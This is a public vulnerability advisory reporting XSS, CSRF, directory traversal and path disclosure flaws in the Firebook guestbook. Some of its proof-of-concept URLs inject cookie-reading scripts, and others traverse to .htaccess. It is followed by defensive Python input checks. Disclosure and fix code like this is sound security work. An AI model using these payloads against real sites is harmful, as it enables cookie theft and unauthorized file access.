Computer Security
[EN] securityvulns.ru
From: MustLive <mustlive_(at)_websecurity.com.ua>
Date: 17.06.2010
Subject: Vulnerabilities in Firebook

Hello 3APA3A!

I am informing you about the Information Leakage, Cross-Site Request Forgery, Cross-Site Scripting, Directory Traversal and Full path disclosure vulnerabilities I found in
Firebook.

Information Leakage:

http://site/path_to_firebook_admin/?URLproxy=http://firebook.ru/env/index.html;

CSRF:

http://site/path_to_firebook_admin/?URLproxy=http://firebook.ru/env/index.html;

CSRF attacks against other sites are possible.

XSS:

http://site/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Directory Traversal:

http://site/path_to_firebook_admin/?param=1;show=../.htaccess;

http://site/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html

Full path disclosure:

http://site/path_to_firebook_admin/?param=1;show=param.txt;

http://site/guestbook/index.html?answer=guestbook/guest/1

All versions of Firebook are vulnerable.

Additional information about these vulnerabilities is on my site:
http://websecurity.com.ua/4124/

Best wishes & regards,
MustLive
Site administrator
http://websecurity.com.ua
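As an added example (not code from MustLive's post or from Firebook), the server-side checks a fix for the advisory above would need: path parameters such as `answer` and `show` confined to one directory after URL-decoding and normalisation, so that both the literal `../` and the `%2E%2E/` form are rejected, and `URLproxy` restricted to an allowlist of hosts so the admin script no longer acts as an open proxy. `GUESTBOOK_ROOT`, `ADMIN_DATA`, `PROXY_HOSTS` and the function names are assumptions about the application layout; output encoding for the reflected XSS is a separate fix not shown here.

```python
"""Hypothetical input checks for the Firebook parameters in the advisory.
Not Firebook's code: the directory and host constants are assumed values."""
import posixpath
from urllib.parse import unquote, urlsplit

GUESTBOOK_ROOT = "guestbook/guest"   # assumed: where 'answer' files live
ADMIN_DATA = "admin/data"            # assumed: where 'show' files live
PROXY_HOSTS = {"firebook.ru"}        # assumed: only hosts URLproxy may fetch


def safe_relative_path(value, root):
    """Return `value` normalised and confined under `root`, else None.

    The part after the first ';' (the advisory's parameter separator) is
    dropped, then the value is decoded twice because the web server may
    decode once and the application again ('%252E' -> '%2E' -> '.')."""
    value = value.split(";", 1)[0]
    for _ in range(2):
        value = unquote(value)
    if "\x00" in value or "\\" in value or value.startswith("/"):
        return None
    norm = posixpath.normpath(value)     # collapses 'guest/../index.html'
    if not norm.startswith(root + "/"):
        return None                      # resolved outside the directory
    if posixpath.basename(norm).startswith("."):
        return None                      # no dot-files such as .htaccess
    return norm


def admin_show_path(show):
    """'show' is treated as a file name relative to ADMIN_DATA (assumed)."""
    return safe_relative_path(ADMIN_DATA + "/" + show, ADMIN_DATA)


def allowed_proxy_target(url, hosts=PROXY_HOSTS):
    """True only for http(s) URLs whose host is on the allowlist.

    Other hosts, non-HTTP schemes and 'user@host' tricks are refused, which
    removes the open-proxy behaviour the advisory uses for leakage and CSRF;
    hostname is already lower-cased by urlsplit."""
    parts = urlsplit(unquote(url).split(";", 1)[0])
    return parts.scheme in ("http", "https") and parts.hostname in hosts
```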

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod